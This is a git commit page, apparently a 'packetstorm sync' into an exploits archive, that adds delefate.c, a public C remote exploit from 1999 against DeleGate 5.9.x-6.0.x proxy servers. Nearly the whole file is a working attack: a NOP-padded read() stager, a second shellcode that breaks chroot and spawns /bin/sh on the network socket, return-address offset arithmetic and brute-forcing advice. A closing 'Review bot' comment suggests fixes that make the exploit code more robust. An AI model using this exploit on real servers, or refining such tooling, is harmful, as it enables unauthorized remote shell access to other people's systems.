authorSkyperTHC2026-03-03 06:28:55 +0000
committerSkyperTHC2026-03-03 06:28:55 +0000
commit5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
treedc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /exploits/7350delefate
parentc6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)
packetstorm sync
Diffstat (limited to 'exploits/7350delefate')
-rw-r--r--exploits/7350delefate/delefate.c325
1 files changed, 325 insertions, 0 deletions
diff --git a/exploits/7350delefate/delefate.c b/exploits/7350delefate/delefate.c
new file mode 100644
index 0000000..716d155
--- /dev/null
+++ b/exploits/7350delefate/delefate.c
@@ -0,0 +1,325 @@
1/* delefate.c
2 * delegate 5.9.x - 6.0.x remote exploit
3 *
4 * public
5 *
6 * will open a shell with the privileges of the nobody user.
7 *
8 * 1999/13/11 by scut of teso [http://teso.scene.at/]
9 *
10 * word to whole team teso, ADM, w00w00, beavuh and stealth :).
11 * special thanks to xdr for donating a bit of his elite debugging skillz.
12 */
13
14#include <sys/types.h>
15#include <sys/time.h>
16#include <sys/socket.h>
17#include <netinet/in.h>
18#include <arpa/inet.h>
19#include <unistd.h>
20#include <errno.h>
21#include <stdlib.h>
22#include <stdio.h>
23#include <string.h>
24#include <fcntl.h>
25#include <netdb.h>
26
27
28#define XP_OFFSET 0xbfffe074 /* offset */
29unsigned long int xp_off = XP_OFFSET;
30
31/* you don't have to modify this :) i hope :)
32 */
33#define XP_NETWORK_FD 12
34#define XP_NETWORK_OFFSET 0x00000101 /* fixed relative network socket offset */
35#define XP_SHELLCODE_OFFSET 0x00000104 /* fixed relative retaddr offset */
36#define XP_DIFF 0x0000000e /* 14 bytes after XP_OFFSET starts the shellcode */
37
38#define XP_SH2_FD1 0x00000011
39#define XP_SH2_FD2 0x0000001d
40#define XP_SH2_FD3 0x0000002a
41
42
43#define GREEN "\E[32m"
44#define BOLD "\E[1m"
45#define NORMAL "\E[m"
46#define RED "\E[31m"
47
48/* local functions
49 */
50void usage (void);
51void shell (int socket);
52unsigned long int net_resolve (char *host);
53int net_connect (struct sockaddr_in *cs, char *server,
54 unsigned short int port, int sec);
55
56
57/* because the buffer is rather small (256 bytes), we use a minimalistic
58 * read() shellcode to increase the chances to hit a correct offet
59 */
60unsigned char shellcode1[] =
61 "\x77\x68\x6f\x69\x73\x3a\x2f\x2f\x61\x20\x62\x20\x31\x20\x90\x90"
62 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
63 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
64 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
65 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
66 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
67 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
68 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
69 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
70 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
71 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
72 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
73 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
74 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
75 "\x90\x90\x90\x90\x90\x90"
76
77 /* 30 byte read() shellcode by scut */
78 "\x33\xd2\x33\xc0\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x80\xc2"
79 "\x10\x03\xca\xc1\xc2\x04\xb0\x03\x33\xdb\xb3\x0c\xcd\x80"
80 /* ^^ network fd */
81 "\x82\xe0\xff\xbf" /* return address */
82
83 "\x0d\x0a";
84
85
86/* uid+chroot-break+shell shellcode by lamerz, thanks !
87 * slightly modified by scut to take care of the network socket
88 */
89unsigned char shellcode2[]=
90 "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9"
91 "\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0"
92 "\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd"
93 "\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e"
94 "\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27"
95 "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d"
96 "\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c"
97 "\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d"
98 "\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
99 "\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b"
100 "\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30"
101 "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67";
102
103
104void
105usage (void)
106{
107 printf (GREEN BOLD "delefate - delegate 5.9.x, 6.0.x remote" NORMAL "\n"
108 "by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n"
109
110 "usage.... : ./delefate <host> <port> [offset-add]\n"
111 "example.. : ./delefate localhost 8080 -100\n\n"
112 "for brute forcing, try from -2000 to 500 in steps of 200\n\n");
113
114 exit (EXIT_FAILURE);
115}
116
117int
118main (int argc, char **argv)
119{
120 int socket;
121 char *server;
122 struct sockaddr_in sa;
123 unsigned short int port_dest;
124 unsigned char *retaddr_ptr;
125 unsigned long int offset;
126 unsigned char *stack = NULL;
127
128 if (argc < 3)
129 usage ();
130
131 printf (GREEN BOLD "delefate 5.9.x - 6.0.x remote exploit" NORMAL "\n"
132 "by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n");
133
134 if (argc == 4) {
135 long int xp_add = 0;
136
137 if (sscanf (argv[3], "%ld", &xp_add) != 1) {
138 usage ();
139 }
140 xp_off += xp_add;
141 }
142 printf (" " GREEN "-" NORMAL " using offset 0x%08x\n", xp_off);
143
144 server = argv[1];
145 port_dest = atoi (argv[2]);
146
147 /* do the offset
148 */
149 retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET;
150 offset = xp_off + XP_DIFF;
151 *retaddr_ptr = (offset & 0x000000ff) >> 0;
152 *(retaddr_ptr + 1) = (offset & 0x0000ff00) >> 8;
153 *(retaddr_ptr + 2) = (offset & 0x00ff0000) >> 16;
154 *(retaddr_ptr + 3) = (offset & 0xff000000) >> 24;
155 *(shellcode1 + XP_NETWORK_OFFSET) = (unsigned char) XP_NETWORK_FD;
156 *(shellcode2 + XP_SH2_FD1) = (unsigned char) XP_NETWORK_FD;
157 *(shellcode2 + XP_SH2_FD2) = (unsigned char) XP_NETWORK_FD;
158 *(shellcode2 + XP_SH2_FD3) = (unsigned char) XP_NETWORK_FD;
159
160 printf (" " GREEN "-" NORMAL " connecting to " GREEN "%s:%hu" NORMAL "...", server, port_dest);
161 fflush (stdout);
162
163 socket = net_connect (&sa, server, port_dest, 45);
164 if (socket <= 0) {
165 printf (" " RED BOLD "failed" NORMAL ".\n");
166 perror ("net_connect");
167 exit (EXIT_FAILURE);
168 }
169 printf (" " GREEN BOLD "connected." NORMAL "\n");
170
171 /* send minimalistic read() shellcode */
172 printf (" " GREEN "-" NORMAL " sending first shellcode...\n");
173 write (socket, shellcode1, strlen (shellcode1));
174 sleep (1);
175
176 /* now send the real shellcode :-) */
177 printf (" " GREEN "-" NORMAL " sending second shellcode...\n");
178 write (socket, shellcode2, strlen (shellcode2));
179
180 printf (" " GREEN "-" NORMAL " spawning shell...\n\n");
181 shell (socket);
182 close (socket);
183
184
185 exit (EXIT_SUCCESS);
186}
187
188unsigned long int
189net_resolve (char *host)
190{
191 long i;
192 struct hostent *he;
193
194 i = inet_addr (host);
195 if (i == -1) {
196 he = gethostbyname (host);
197 if (he == NULL) {
198 return (0);
199 } else {
200 return (*(unsigned long *) he->h_addr);
201 }
202 }
203
204 return (i);
205}
206
207
208/* original version by typo, modified by scut
209 */
210
211void
212shell (int socket)
213{
214 char io_buf[1024];
215 int n;
216 fd_set fds;
217
218 while (1) {
219 FD_SET (0, &fds);
220 FD_SET (socket, &fds);
221
222 select (socket + 1, &fds, NULL, NULL, NULL);
223 if (FD_ISSET (0, &fds)) {
224 n = read (0, io_buf, sizeof (io_buf));
225 if (n <= 0)
226 return;
227 write (socket, io_buf, n);
228 }
229
230 if (FD_ISSET (socket, &fds)) {
231 n = read (socket, io_buf, sizeof (io_buf));
232 if (n <= 0)
233 return;
234 write (1, io_buf, n);
235 }
236 }
237}
238
239
240int
241net_connect (struct sockaddr_in *cs, char *server,
242 unsigned short int port, int sec)
243{
244 int n, len, error, flags;
245 int fd;
246 struct timeval tv;
247 fd_set rset, wset;
248
249 /* first allocate a socket */
250 cs->sin_family = AF_INET;
251 cs->sin_port = htons (port);
252 fd = socket (cs->sin_family, SOCK_STREAM, 0);
253 if (fd == -1)
254 return (-1);
255
256 cs->sin_addr.s_addr = net_resolve (server);
257 if (cs->sin_addr.s_addr == 0) {
258 close (fd);
259 return (-1);
260 }
261
262 flags = fcntl (fd, F_GETFL, 0);
263 if (flags == -1) {
264 close (fd);
265 return (-1);
266 }
267 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
268 if (n == -1) {
269 close (fd);
270 return (-1);
271 }
272
273 error = 0;
274
275 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
276 if (n < 0) {
277 if (errno != EINPROGRESS) {
278 close (fd);
279 return (-1);
280 }
281 }
282 if (n == 0)
283 goto done;
284
285 FD_ZERO(&rset);
286 FD_ZERO(&wset);
287 FD_SET(fd, &rset);
288 FD_SET(fd, &wset);
289 tv.tv_sec = sec;
290 tv.tv_usec = 0;
291
292 n = select(fd + 1, &rset, &wset, NULL, &tv);
293 if (n == 0) {
294 close(fd);
295 errno = ETIMEDOUT;
296 return (-1);
297 }
298 if (n == -1)
299 return (-1);
300
301 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
302 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
303 len = sizeof(error);
304 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
305 errno = ETIMEDOUT;
306 return (-1);
307 }
308 if (error == 0) {
309 goto done;
310 } else {
311 errno = error;
312 return (-1);
313 }
314 }
315 } else
316 return (-1);
317
318done:
319 n = fcntl(fd, F_SETFL, flags);
320 if (n == -1)
321 return (-1);
322
323 return (fd);
324}
325
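Review bot: net_connect leaks the socket on most of its late failure paths: the `if (n == -1) return (-1);` after select, the getsockopt failure, the `errno = error; return (-1);` branch, the trailing `else return (-1);` and the final fcntl failure all return without `close (fd)`, while the earlier error paths in the same function do close it. Consolidating them behind one label, `fail: close (fd); return (-1);`, with each of those sites becoming `goto fail;` keeps the function's -1 contract and stops the descriptor leak; note the ETIMEDOUT branch already closes and should set errno after the close so it is not clobbered. Separately, `len` is declared `int` but getsockopt takes a `socklen_t *`, so it should be `socklen_t len = sizeof (error);`, and in main the `printf (" ... using offset 0x%08x\n", xp_off)` passes an `unsigned long` to `%x`, which is undefined; `%08lx` matches the argument. In shell(), `fds` is never passed through `FD_ZERO` before the loop, so the first select sees an uninitialized fd_set, which is undefined behaviour rather than an empty set.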